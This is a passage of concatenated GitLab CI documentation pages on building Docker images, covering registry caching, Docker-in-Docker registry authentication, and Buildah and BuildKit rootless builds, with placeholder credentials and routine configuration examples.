$CI_REGISTRY_IMAGE:latest --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --tag $CI_REGISTRY_IMAGE:latest . - docker push $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA - docker push $CI_REGISTRY_IMAGE:latest ``` In the `script` section for the `build` job: 1. The first command tries to pull the image from the registry so that it can be used as a cache for the `docker build` command. Any image that's used with the `--cache-from` argument must be pulled (using `docker pull`) before it can be used as a cache source. 1. The second command builds a Docker image by using the pulled image as a cache (see the `--cache-from $CI_REGISTRY_IMAGE:latest` argument) if available, and tags it. The `--build-arg BUILDKIT_INLINE_CACHE=1` tells Docker to use [inline caching](https://docs.docker.com/build/cache/backends/inline/), which embeds the build cache into the image itself. 1. The last two commands push the tagged Docker images to the container registry so that they can also be used as cache for subsequent builds. ## Docker registry caching example You can cache your Docker builds directly to a dedicated cache image in the registry. This example `.gitlab-ci.yml` file shows how to use Docker caching with the `docker buildx build` command and the `registry` cache backend. For more advanced caching options, see [Cache storage backends](https://docs.docker.com/build/cache/backends/). ```yaml default: image: docker:27.4.1 services: - docker:27.4.1-dind before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY variables: # Use TLS https://docs.gitlab.com/ee/ci/docker/using_docker_build.html#tls-enabled DOCKER_HOST: tcp://docker:2376 DOCKER_TLS_CERTDIR: "/certs" build: stage: build script: - docker context create my-builder - docker buildx create my-builder --driver docker-container --use - docker buildx build --push -t $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --cache-to type=registry,ref=$CI_REGISTRY_IMAGE/cache-image,mode=max --cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image . ``` The `build` job's `script`: 1. Creates and configures the `docker-container` BuildKit driver, which supports the `registry` cache backend. 1. Builds and pushes a Docker image using: - A dedicated cache image with `--cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image`. - Cache updates with `--cache-to type=registry,ref=$CI_REGISTRY_IMAGE/cache-image,mode=max`, where `max` mode caches intermediate layers.
https://docs.gitlab.com/ci/using_kaniko
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/using_kaniko.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
using_kaniko.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use kaniko to build Docker images (removed)
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [kaniko](https://github.com/GoogleContainerTools/kaniko) is no longer a maintained project. For more information, see [issue 3348](https://github.com/GoogleContainerTools/kaniko/issues/3348). Use [Docker to build Docker images](using_docker_build.md), [Buildah](using_docker_build.md#buildah-example), [Podman to run Docker commands](https://docs.gitlab.com/runner/executors/docker/#use-podman-to-run-docker-commands), or [Podman with GitLab Runner on Kubernetes](https://docs.gitlab.com/runner/executors/kubernetes/use_podman_with_kubernetes/) instead.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use kaniko to build Docker images (removed) breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [kaniko](https://github.com/GoogleContainerTools/kaniko) is no longer a maintained project. For more information, see [issue 3348](https://github.com/GoogleContainerTools/kaniko/issues/3348). Use [Docker to build Docker images](using_docker_build.md), [Buildah](using_docker_build.md#buildah-example), [Podman to run Docker commands](https://docs.gitlab.com/runner/executors/docker/#use-podman-to-run-docker-commands), or [Podman with GitLab Runner on Kubernetes](https://docs.gitlab.com/runner/executors/kubernetes/use_podman_with_kubernetes/) instead.
https://docs.gitlab.com/ci/authenticate_registry
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/authenticate_registry.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
authenticate_registry.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Authenticate with registry in Docker-in-Docker
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service. ## Option 1: Run `docker login` In [`before_script`](../yaml/_index.md#before_script), run `docker login`: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind variables: DOCKER_TLS_CERTDIR: "/certs" build: stage: build before_script: - echo "$DOCKER_REGISTRY_PASS" | docker login $DOCKER_REGISTRY --username $DOCKER_REGISTRY_USER --password-stdin script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` To sign in to Docker Hub, leave `$DOCKER_REGISTRY` empty or remove it. ## Option 2: Mount `~/.docker/config.json` on each job If you are an administrator for GitLab Runner, you can mount a file with the authentication configuration to `~/.docker/config.json`. Then every job that the runner picks up is already authenticated. If you are using the official `docker:24.0.5` image, the home directory is under `/root`. If you mount the configuration file, any `docker` command that modifies the `~/.docker/config.json` fails. For example, `docker login` fails, because the file is mounted as read-only. Do not change it from read-only, because this causes problems. Here is an example of `/opt/.docker/config.json` that follows the [`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) documentation: ```json { "auths": { "https://index.docker.io/v1/": { "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=" } } } ``` ### Docker Update the [volume mounts](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section) to include the file. ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true volumes = ["/opt/.docker/config.json:/root/.docker/config.json:ro"] ``` ### Kubernetes Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. You can do this with a command like: ```shell kubectl create configmap docker-client-config --namespace gitlab-runner --from-file /opt/.docker/config.json ``` Update the [volume mounts](https://docs.gitlab.com/runner/executors/kubernetes/#custom-volume-mount) to include the file. ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "docker-client-config" mount_path = "/root/.docker/config.json" sub_path = "config.json" ``` ## Option 3: Use `DOCKER_AUTH_CONFIG` If you already have [`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) defined, you can use the variable and save it in `~/.docker/config.json`. You can define this authentication in several ways: - In [`pre_build_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) in the runner configuration file. - In [`before_script`](../yaml/_index.md#before_script). - In [`script`](../yaml/_index.md#script). The following example shows [`before_script`](../yaml/_index.md#before_script). The same commands apply for any solution you implement. ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind variables: DOCKER_TLS_CERTDIR: "/certs" build: stage: build before_script: - mkdir -p $HOME/.docker - echo $DOCKER_AUTH_CONFIG > $HOME/.docker/config.json script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ```
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Authenticate with registry in Docker-in-Docker breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service. ## Option 1: Run `docker login` In [`before_script`](../yaml/_index.md#before_script), run `docker login`: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind variables: DOCKER_TLS_CERTDIR: "/certs" build: stage: build before_script: - echo "$DOCKER_REGISTRY_PASS" | docker login $DOCKER_REGISTRY --username $DOCKER_REGISTRY_USER --password-stdin script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` To sign in to Docker Hub, leave `$DOCKER_REGISTRY` empty or remove it. ## Option 2: Mount `~/.docker/config.json` on each job If you are an administrator for GitLab Runner, you can mount a file with the authentication configuration to `~/.docker/config.json`. Then every job that the runner picks up is already authenticated. If you are using the official `docker:24.0.5` image, the home directory is under `/root`. If you mount the configuration file, any `docker` command that modifies the `~/.docker/config.json` fails. For example, `docker login` fails, because the file is mounted as read-only. Do not change it from read-only, because this causes problems. Here is an example of `/opt/.docker/config.json` that follows the [`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) documentation: ```json { "auths": { "https://index.docker.io/v1/": { "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=" } } } ``` ### Docker Update the [volume mounts](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section) to include the file. ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true volumes = ["/opt/.docker/config.json:/root/.docker/config.json:ro"] ``` ### Kubernetes Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. You can do this with a command like: ```shell kubectl create configmap docker-client-config --namespace gitlab-runner --from-file /opt/.docker/config.json ``` Update the [volume mounts](https://docs.gitlab.com/runner/executors/kubernetes/#custom-volume-mount) to include the file. ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "docker-client-config" mount_path = "/root/.docker/config.json" sub_path = "config.json" ``` ## Option 3: Use `DOCKER_AUTH_CONFIG` If you already have [`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) defined, you can use the variable and save it in `~/.docker/config.json`. You can define this authentication in several ways: - In [`pre_build_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) in the runner configuration file. - In [`before_script`](../yaml/_index.md#before_script). - In [`script`](../yaml/_index.md#script). The following example shows [`before_script`](../yaml/_index.md#before_script). The same commands apply for any solution you implement. ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind variables: DOCKER_TLS_CERTDIR: "/certs" build: stage: build before_script: - mkdir -p $HOME/.docker - echo $DOCKER_AUTH_CONFIG > $HOME/.docker/config.json script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ```
https://docs.gitlab.com/ci/docker
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Docker integration
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can incorporate [Docker](https://www.docker.com) into your CI/CD workflow in two primary ways: - [Run your CI/CD jobs](using_docker_images.md) in Docker containers. Create jobs to test, build, or publish applications that run in Docker containers. For example, use a Node image from Docker Hub so your job runs in a container with all the Node dependencies you need. - Use [Docker Build](using_docker_build.md) or [BuildKit](using_buildkit.md) to build Docker images. Create jobs that build Docker images and publish them to a container registry. BuildKit provides multiple approaches including rootless builds.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Docker integration breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can incorporate [Docker](https://www.docker.com) into your CI/CD workflow in two primary ways: - [Run your CI/CD jobs](using_docker_images.md) in Docker containers. Create jobs to test, build, or publish applications that run in Docker containers. For example, use a Node image from Docker Hub so your job runs in a container with all the Node dependencies you need. - Use [Docker Build](using_docker_build.md) or [BuildKit](using_buildkit.md) to build Docker images. Create jobs that build Docker images and publish them to a container registry. BuildKit provides multiple approaches including rootless builds.
https://docs.gitlab.com/ci/buildah_rootless_multi_arch
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/buildah_rootless_multi_arch.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
buildah_rootless_multi_arch.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use Buildah to build multi-platform images
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use Buildah to build images for multiple CPU architectures. Multi-platform builds create images that work across different hardware platforms, and Docker automatically selects the appropriate image for each deployment target. ## Prerequisites - A Dockerfile to build the image from - (Optional) GitLab runners running on different CPU architectures ## Build multi-platform images To build multi-platform images with Buildah: 1. Configure separate build jobs for each target architecture. 1. Create a manifest job that combines the architecture-specific images. 1. Configure the manifest job to push the combined manifest to your registry. Running jobs on their respective architectures avoids performance issues from CPU instruction translation. However, you can run both builds on a single architecture if needed. Building for non-native architecture may result in slower build times. The following example uses two [GitLab-hosted runners on Linux](../../ci/runners/hosted_runners/linux.md): - `saas-linux-small-arm64` - `saas-linux-small-amd64` ```yaml stages: - build variables: STORAGE_DRIVER: vfs BUILDAH_FORMAT: docker FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE:latest" default: image: quay.io/buildah/stable before_script: - echo "$CI_REGISTRY_PASSWORD" | buildah login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY build-amd64: stage: build tags: - saas-linux-small-amd64 script: - buildah build --platform=linux/amd64 -t $CI_REGISTRY_IMAGE:amd64 . - buildah push $CI_REGISTRY_IMAGE:amd64 build-arm64: stage: build tags: - saas-linux-small-arm64 script: - buildah build --platform=linux/arm64/v8 -t $CI_REGISTRY_IMAGE:arm64 . - buildah push $CI_REGISTRY_IMAGE:arm64 create_manifest: stage: build needs: ["build-arm64", "build-amd64"] tags: - saas-linux-small-amd64 script: - buildah manifest create $FQ_IMAGE_NAME - buildah manifest add $FQ_IMAGE_NAME docker://$CI_REGISTRY_IMAGE:amd64 - buildah manifest add $FQ_IMAGE_NAME docker://$CI_REGISTRY_IMAGE:arm64 - buildah manifest push --all $FQ_IMAGE_NAME ``` This pipeline creates architecture-specific images tagged with `amd64` and `arm64`, then combines them into a single manifest available under the `latest` tag. ## Troubleshooting ### Build fails with authentication errors If you encounter registry authentication failures: - Verify that `CI_REGISTRY_USER` and `CI_REGISTRY_PASSWORD` variables are available. - Check that you have push permissions to the target registry. - For external registries, ensure authentication credentials are correctly configured in your project's CI/CD variables. ### Multi-platform builds fail For multi-platform build issues: - Verify that base images in your `Dockerfile` support the target architectures. - Check that architecture-specific dependencies are available for all target platforms. - Consider using conditional statements in your `Dockerfile` for architecture-specific logic.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use Buildah to build multi-platform images breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use Buildah to build images for multiple CPU architectures. Multi-platform builds create images that work across different hardware platforms, and Docker automatically selects the appropriate image for each deployment target. ## Prerequisites - A Dockerfile to build the image from - (Optional) GitLab runners running on different CPU architectures ## Build multi-platform images To build multi-platform images with Buildah: 1. Configure separate build jobs for each target architecture. 1. Create a manifest job that combines the architecture-specific images. 1. Configure the manifest job to push the combined manifest to your registry. Running jobs on their respective architectures avoids performance issues from CPU instruction translation. However, you can run both builds on a single architecture if needed. Building for non-native architecture may result in slower build times. The following example uses two [GitLab-hosted runners on Linux](../../ci/runners/hosted_runners/linux.md): - `saas-linux-small-arm64` - `saas-linux-small-amd64` ```yaml stages: - build variables: STORAGE_DRIVER: vfs BUILDAH_FORMAT: docker FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE:latest" default: image: quay.io/buildah/stable before_script: - echo "$CI_REGISTRY_PASSWORD" | buildah login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY build-amd64: stage: build tags: - saas-linux-small-amd64 script: - buildah build --platform=linux/amd64 -t $CI_REGISTRY_IMAGE:amd64 . - buildah push $CI_REGISTRY_IMAGE:amd64 build-arm64: stage: build tags: - saas-linux-small-arm64 script: - buildah build --platform=linux/arm64/v8 -t $CI_REGISTRY_IMAGE:arm64 . - buildah push $CI_REGISTRY_IMAGE:arm64 create_manifest: stage: build needs: ["build-arm64", "build-amd64"] tags: - saas-linux-small-amd64 script: - buildah manifest create $FQ_IMAGE_NAME - buildah manifest add $FQ_IMAGE_NAME docker://$CI_REGISTRY_IMAGE:amd64 - buildah manifest add $FQ_IMAGE_NAME docker://$CI_REGISTRY_IMAGE:arm64 - buildah manifest push --all $FQ_IMAGE_NAME ``` This pipeline creates architecture-specific images tagged with `amd64` and `arm64`, then combines them into a single manifest available under the `latest` tag. ## Troubleshooting ### Build fails with authentication errors If you encounter registry authentication failures: - Verify that `CI_REGISTRY_USER` and `CI_REGISTRY_PASSWORD` variables are available. - Check that you have push permissions to the target registry. - For external registries, ensure authentication credentials are correctly configured in your project's CI/CD variables. ### Multi-platform builds fail For multi-platform build issues: - Verify that base images in your `Dockerfile` support the target architectures. - Check that architecture-specific dependencies are available for all target platforms. - Consider using conditional statements in your `Dockerfile` for architecture-specific logic.
https://docs.gitlab.com/ci/buildah_rootless_tutorial
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/buildah_rootless_tutorial.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
buildah_rootless_tutorial.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Use Buildah in a rootless container with GitLab Runner Operator on OpenShift
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This tutorial teaches you how to successfully build images using the `buildah` tool, with GitLab Runner deployed using [GitLab Runner Operator](https://gitlab.com/gitlab-org/gl-openshift/gitlab-runner-operator) on an OpenShift cluster. This guide is an adaptation of [using Buildah to build images in a rootless OpenShift container](https://github.com/containers/buildah/blob/main/docs/tutorials/05-openshift-rootless-build.md) documentation for GitLab Runner Operator. To complete this tutorial, you will: 1. [Configure the Buildah image](#configure-the-buildah-image) 1. [Configure the service account](#configure-the-service-account) 1. [Configure the job](#configure-the-job) ## Prerequisites - A runner already deployed to a `gitlab-runner` namespace. ## Configure the Buildah image We start by preparing a custom image based on the `quay.io/buildah/stable:v1.23.1` image. 1. Create the `Containerfile-buildah` file: ```shell cat > Containerfile-buildah <<EOF FROM quay.io/buildah/stable:v1.23.1 RUN touch /etc/subgid /etc/subuid \ && chmod g=u /etc/subgid /etc/subuid /etc/passwd \ && echo build:10000:65536 > /etc/subuid \ && echo build:10000:65536 > /etc/subgid # Use chroot because the default runc does not work when running rootless RUN echo "export BUILDAH_ISOLATION=chroot" >> /home/build/.bashrc # Use VFS because fuse does not work RUN mkdir -p /home/build/.config/containers \ && (echo '[storage]';echo 'driver = "vfs"') > /home/build/.config/containers/storage.conf # The buildah container will run as `build` user USER build WORKDIR /home/build EOF ``` 1. Build and push the Buildah image to a container registry. Let's push to the [GitLab container registry](../../user/packages/container_registry/_index.md): ```shell docker build -f Containerfile-buildah -t registry.example.com/group/project/buildah:1.23.1 . docker push registry.example.com/group/project/buildah:1.23.1 ``` ## Configure the service account For these steps, you need to run the commands in a terminal connected to the OpenShift cluster. 1. Run this command to create a service account named `buildah-sa`: ```shell oc create -f - <<EOF apiVersion: v1 kind: ServiceAccount metadata: name: buildah-sa namespace: gitlab-runner EOF ``` 1. Give the created service account the ability to run with `anyuid` [SCC](https://docs.openshift.com/container-platform/4.3/authentication/managing-security-context-constraints.html): ```shell oc adm policy add-scc-to-user anyuid -z buildah-sa -n gitlab-runner ``` 1. Use a [runner configuration template](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#customize-configtoml-with-a-configuration-template) to configure Operator to use the service account we just created. Create a `custom-config.toml` file that contains: ```toml [[runners]] [runners.kubernetes] service_account_overwrite_allowed = "buildah-*" ``` 1. Create a `ConfigMap` named `custom-config-toml` from the `custom-config.toml` file: ```shell oc create configmap custom-config-toml --from-file config.toml=custom-config.toml -n gitlab-runner ``` 1. Set the `config` property of the `Runner` by updating its [Custom Resource Definition (CRD) file](https://docs.gitlab.com/runner/install/operator.html#install-gitlab-runner): ```yaml apiVersion: apps.gitlab.com/v1beta2 kind: Runner metadata: name: builah-runner spec: gitlabUrl: https://gitlab.example.com token: gitlab-runner-secret config: custom-config-toml ``` ## Configure the job The final step is to set up a GitLab CI/CD configuration file in you project to use the image we built and the configured service account: ```yaml build: stage: build image: registry.example.com/group/project/buildah:1.23.1 variables: STORAGE_DRIVER: vfs BUILDAH_FORMAT: docker BUILDAH_ISOLATION: chroot FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE/test" KUBERNETES_SERVICE_ACCOUNT_OVERWRITE: "buildah-sa" before_script: # Log in to the GitLab container registry - buildah login -u "$CI_REGISTRY_USER" --password $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - buildah images - buildah build -t $FQ_IMAGE_NAME - buildah images - buildah push $FQ_IMAGE_NAME ``` The job should use the image that we built as the value of `image` keyword. The `KUBERNETES_SERVICE_ACCOUNT_OVERWRITE` variable should have the value of the service account name that we created. Congratulations, you've successfully built an image with Buildah in a rootless container! ## Troubleshooting There is a [known issue](https://github.com/containers/buildah/issues/4049) with running as non-root. You might need to use a [workaround](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#configure-setfcap) if you are using an OpenShift runner.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: 'Tutorial: Use Buildah in a rootless container with GitLab Runner Operator on OpenShift' breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This tutorial teaches you how to successfully build images using the `buildah` tool, with GitLab Runner deployed using [GitLab Runner Operator](https://gitlab.com/gitlab-org/gl-openshift/gitlab-runner-operator) on an OpenShift cluster. This guide is an adaptation of [using Buildah to build images in a rootless OpenShift container](https://github.com/containers/buildah/blob/main/docs/tutorials/05-openshift-rootless-build.md) documentation for GitLab Runner Operator. To complete this tutorial, you will: 1. [Configure the Buildah image](#configure-the-buildah-image) 1. [Configure the service account](#configure-the-service-account) 1. [Configure the job](#configure-the-job) ## Prerequisites - A runner already deployed to a `gitlab-runner` namespace. ## Configure the Buildah image We start by preparing a custom image based on the `quay.io/buildah/stable:v1.23.1` image. 1. Create the `Containerfile-buildah` file: ```shell cat > Containerfile-buildah <<EOF FROM quay.io/buildah/stable:v1.23.1 RUN touch /etc/subgid /etc/subuid \ && chmod g=u /etc/subgid /etc/subuid /etc/passwd \ && echo build:10000:65536 > /etc/subuid \ && echo build:10000:65536 > /etc/subgid # Use chroot because the default runc does not work when running rootless RUN echo "export BUILDAH_ISOLATION=chroot" >> /home/build/.bashrc # Use VFS because fuse does not work RUN mkdir -p /home/build/.config/containers \ && (echo '[storage]';echo 'driver = "vfs"') > /home/build/.config/containers/storage.conf # The buildah container will run as `build` user USER build WORKDIR /home/build EOF ``` 1. Build and push the Buildah image to a container registry. Let's push to the [GitLab container registry](../../user/packages/container_registry/_index.md): ```shell docker build -f Containerfile-buildah -t registry.example.com/group/project/buildah:1.23.1 . docker push registry.example.com/group/project/buildah:1.23.1 ``` ## Configure the service account For these steps, you need to run the commands in a terminal connected to the OpenShift cluster. 1. Run this command to create a service account named `buildah-sa`: ```shell oc create -f - <<EOF apiVersion: v1 kind: ServiceAccount metadata: name: buildah-sa namespace: gitlab-runner EOF ``` 1. Give the created service account the ability to run with `anyuid` [SCC](https://docs.openshift.com/container-platform/4.3/authentication/managing-security-context-constraints.html): ```shell oc adm policy add-scc-to-user anyuid -z buildah-sa -n gitlab-runner ``` 1. Use a [runner configuration template](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#customize-configtoml-with-a-configuration-template) to configure Operator to use the service account we just created. Create a `custom-config.toml` file that contains: ```toml [[runners]] [runners.kubernetes] service_account_overwrite_allowed = "buildah-*" ``` 1. Create a `ConfigMap` named `custom-config-toml` from the `custom-config.toml` file: ```shell oc create configmap custom-config-toml --from-file config.toml=custom-config.toml -n gitlab-runner ``` 1. Set the `config` property of the `Runner` by updating its [Custom Resource Definition (CRD) file](https://docs.gitlab.com/runner/install/operator.html#install-gitlab-runner): ```yaml apiVersion: apps.gitlab.com/v1beta2 kind: Runner metadata: name: builah-runner spec: gitlabUrl: https://gitlab.example.com token: gitlab-runner-secret config: custom-config-toml ``` ## Configure the job The final step is to set up a GitLab CI/CD configuration file in you project to use the image we built and the configured service account: ```yaml build: stage: build image: registry.example.com/group/project/buildah:1.23.1 variables: STORAGE_DRIVER: vfs BUILDAH_FORMAT: docker BUILDAH_ISOLATION: chroot FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE/test" KUBERNETES_SERVICE_ACCOUNT_OVERWRITE: "buildah-sa" before_script: # Log in to the GitLab container registry - buildah login -u "$CI_REGISTRY_USER" --password $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - buildah images - buildah build -t $FQ_IMAGE_NAME - buildah images - buildah push $FQ_IMAGE_NAME ``` The job should use the image that we built as the value of `image` keyword. The `KUBERNETES_SERVICE_ACCOUNT_OVERWRITE` variable should have the value of the service account name that we created. Congratulations, you've successfully built an image with Buildah in a rootless container! ## Troubleshooting There is a [known issue](https://github.com/containers/buildah/issues/4049) with running as non-root. You might need to use a [workaround](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#configure-setfcap) if you are using an OpenShift runner.
https://docs.gitlab.com/ci/using_buildkit
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/using_buildkit.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
using_buildkit.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Build Docker images with BuildKit
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [BuildKit](https://docs.docker.com/build/buildkit/) is the build engine used by Docker and provides multi-platform builds and build caching. ## BuildKit methods BuildKit offers the following methods to build Docker images: | Method | Security requirement | Commands | Use when you need | | ----------------- | ------------------------ | ------------------------ | ----------------- | | BuildKit rootless | No privileged containers | `buildctl-daemonless.sh` | Maximum security or a replacement for Kaniko | | Docker Buildx | Requires `docker:dind` | `docker buildx` | Familiar Docker workflow | | Native BuildKit | Requires `docker:dind` | `buildctl` | Advanced BuildKit control | ## Prerequisites - GitLab Runner with Docker executor - Docker 19.03 or later to use Docker Buildx - A project with a `Dockerfile` ## BuildKit rootless BuildKit in standalone mode provides rootless image builds without Docker daemon dependency. This method eliminates privileged containers entirely and provides a direct replacement for Kaniko builds. Key differences from other methods: - Uses the `moby/buildkit:rootless` image - Includes `BUILDKITD_FLAGS: --oci-worker-no-process-sandbox` for rootless operation - Uses `buildctl-daemonless.sh` to manage BuildKit daemon automatically - No Docker daemon or privileged container dependency - Requires manual registry authentication setup ### Authenticate with container registries GitLab CI/CD provides automatic authentication for the GitLab container registry through predefined variables. For BuildKit rootless, you must manually create the Docker configuration file. #### Authenticate with the GitLab container registry GitLab automatically provides these predefined variables: - `CI_REGISTRY`: Registry URL - `CI_REGISTRY_USER`: Registry username - `CI_REGISTRY_PASSWORD`: Registry password To configure authentication for rootless builds, add a `before_script` configuration to your jobs. For example: ```yaml before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json ``` #### Authenticate with multiple registries To authenticate with additional container registries, combine authentication entries in your `before_script` section. For example: ```yaml before_script: - mkdir -p ~/.docker - | echo "{ \"auths\": { \"${CI_REGISTRY}\": { \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\" }, \"docker.io\": { \"auth\": \"$(printf "%s:%s" "${DOCKER_HUB_USER}" "${DOCKER_HUB_PASSWORD}" | base64 | tr -d '\n')\" } } }" > ~/.docker/config.json ``` #### Authenticate with the dependency proxy To pull images through the GitLab dependency proxy, configure the authentication in your `before_script` section. For example: ```yaml before_script: - mkdir -p ~/.docker - | echo "{ \"auths\": { \"${CI_REGISTRY}\": { \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\" }, \"$(echo -n $CI_DEPENDENCY_PROXY_SERVER | awk -F[:] '{print $1}')\": { \"auth\": \"$(printf "%s:%s" ${CI_DEPENDENCY_PROXY_USER} "${CI_DEPENDENCY_PROXY_PASSWORD}" | base64 | tr -d '\n')\" } } }" > ~/.docker/config.json ``` For more information, see [authenticate within CI/CD](../../user/packages/dependency_proxy/_index.md#authenticate-within-cicd). ### Build images in rootless mode To build images without Docker daemon dependency, add a job similar to this example: ```yaml build-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo 